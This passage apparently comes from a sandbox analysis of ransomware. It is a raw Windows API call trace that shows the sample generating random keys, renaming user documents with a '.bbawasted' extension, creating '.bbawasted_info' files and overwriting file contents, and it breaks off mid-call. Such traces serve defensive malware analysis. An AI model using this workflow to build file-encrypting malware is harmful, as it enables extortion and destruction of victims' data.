dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.465] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.465] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.473] SetEndOfFile (hFile=0xf8) returned 1 [0070.475] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.475] CloseHandle (hObject=0xf8) returned 1 [0070.476] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.476] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca5a8 | out: hHeap=0x580000) returned 1 [0070.477] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.477] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.477] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\0n7wI7aSjGu0lAAgvw.pdf") returned 86 [0070.477] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b6) returned 0x5bf070 [0070.477] lstrcpyW (in: lpString1=0x5bf11c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.477] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0070.477] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.478] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0070.478] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\0n7wI7aSjGu0lAAgvw.pdf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\0n7wi7asjgu0laagvw.pdf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.479] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.480] SetEndOfFile (hFile=0xf8) returned 1 [0070.480] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.480] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.480] lstrcpyW (in: lpString1=0x5bf11c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\0n7wI7aSjGu0lAAgvw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\0n7wi7asjgu0laagvw.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\0n7wI7aSjGu0lAAgvw.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\0n7wi7asjgu0laagvw.pdf.bbawasted")) returned 1 [0070.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\0n7wI7aSjGu0lAAgvw.pdf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\0n7wi7asjgu0laagvw.pdf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.481] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.481] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x6234 [0070.481] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6234) returned 0x570000 [0070.481] CloseHandle (hObject=0xfc) returned 1 [0070.483] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.484] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.484] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.484] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.485] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.485] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.493] SetEndOfFile (hFile=0xf8) returned 1 [0070.495] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0070.495] CloseHandle (hObject=0xf8) returned 1 [0070.546] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.546] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.546] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.546] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.546] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.546] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\EEiLPQliBCSNXYqnOzY2.doc") returned 88 [0070.547] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ba) returned 0x5bf070 [0070.547] lstrcpyW (in: lpString1=0x5bf120, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.547] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.547] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.547] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.547] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\EEiLPQliBCSNXYqnOzY2.doc.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\eeilpqlibcsnxyqnozy2.doc.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.548] WriteFile (in: hFile=0xfc, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.549] SetEndOfFile (hFile=0xfc) returned 1 [0070.549] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.549] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.549] lstrcpyW (in: lpString1=0x5bf120, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\EEiLPQliBCSNXYqnOzY2.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\eeilpqlibcsnxyqnozy2.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\EEiLPQliBCSNXYqnOzY2.doc.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\eeilpqlibcsnxyqnozy2.doc.bbawasted")) returned 1 [0070.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\EEiLPQliBCSNXYqnOzY2.doc.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\eeilpqlibcsnxyqnozy2.doc.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.550] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.550] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x14964 [0070.550] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14964) returned 0xfe0000 [0070.550] CloseHandle (hObject=0x120) returned 1 [0070.554] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.555] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.555] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.555] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.555] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.556] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.564] SetEndOfFile (hFile=0xfc) returned 1 [0070.566] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.566] CloseHandle (hObject=0xfc) returned 1 [0070.567] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.567] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c70f8 | out: hHeap=0x580000) returned 1 [0070.568] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.568] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.568] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.568] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\G9-w9atu10Guo8r.odp") returned 83 [0070.568] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b0) returned 0x5bf070 [0070.568] lstrcpyW (in: lpString1=0x5bf116, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.568] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.568] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.569] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.569] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\G9-w9atu10Guo8r.odp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\g9-w9atu10guo8r.odp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.570] WriteFile (in: hFile=0xfc, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.571] SetEndOfFile (hFile=0xfc) returned 1 [0070.571] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.571] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.571] lstrcpyW (in: lpString1=0x5bf116, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\G9-w9atu10Guo8r.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\g9-w9atu10guo8r.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\G9-w9atu10Guo8r.odp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\g9-w9atu10guo8r.odp.bbawasted")) returned 1 [0070.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\G9-w9atu10Guo8r.odp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\g9-w9atu10guo8r.odp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.571] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.572] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x10639 [0070.572] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10639) returned 0xfe0000 [0070.572] CloseHandle (hObject=0x11c) returned 1 [0070.575] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.576] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.576] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.576] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.582] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.582] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.590] SetEndOfFile (hFile=0xfc) returned 1 [0070.624] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.624] CloseHandle (hObject=0xfc) returned 1 [0070.625] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.625] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0d50 | out: hHeap=0x580000) returned 1 [0070.625] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.626] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.626] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.626] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\CCslkdH2in0.docx") returned 86 [0070.626] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b6) returned 0x5bf070 [0070.626] lstrcpyW (in: lpString1=0x5bf11c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.626] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.626] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.627] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.627] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\CCslkdH2in0.docx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\ccslkdh2in0.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.627] WriteFile (in: hFile=0xfc, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.628] SetEndOfFile (hFile=0xfc) returned 1 [0070.628] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.628] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.628] lstrcpyW (in: lpString1=0x5bf11c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\CCslkdH2in0.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\ccslkdh2in0.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\CCslkdH2in0.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\ccslkdh2in0.docx.bbawasted")) returned 1 [0070.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\CCslkdH2in0.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\ccslkdh2in0.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.629] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0070.629] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x1e9f [0070.629] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e9f) returned 0x570000 [0070.629] CloseHandle (hObject=0x11c) returned 1 [0070.631] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0070.632] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0070.632] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.632] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0070.632] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0070.633] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.641] SetEndOfFile (hFile=0xfc) returned 1 [0070.643] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.643] CloseHandle (hObject=0xfc) returned 1 [0070.644] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0070.644] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cad40 | out: hHeap=0x580000) returned 1 [0070.644] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0070.645] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0070.645] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\fVO7RhYmN7qpXusaNks4.docx") returned 95 [0070.645] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c8) returned 0x5bf070 [0070.645] lstrcpyW (in: lpString1=0x5bf12e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.645] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.645] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0070.646] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.646] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\fVO7RhYmN7qpXusaNks4.docx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\fvo7rhymn7qpxusanks4.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.654] WriteFile (in: hFile=0xfc, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0070.655] SetEndOfFile (hFile=0xfc) returned 1 [0070.656] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.656] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.656] lstrcpyW (in: lpString1=0x5bf12e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\fVO7RhYmN7qpXusaNks4.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\fvo7rhymn7qpxusanks4.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\fVO7RhYmN7qpXusaNks4.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\fvo7rhymn7qpxusanks4.docx.bbawasted")) returned 1 [0070.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\fVO7RhYmN7qpXusaNks4.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\fvo7rhymn7qpxusanks4.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.656] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.656] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x168a8 [0070.656] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x168a8) returned 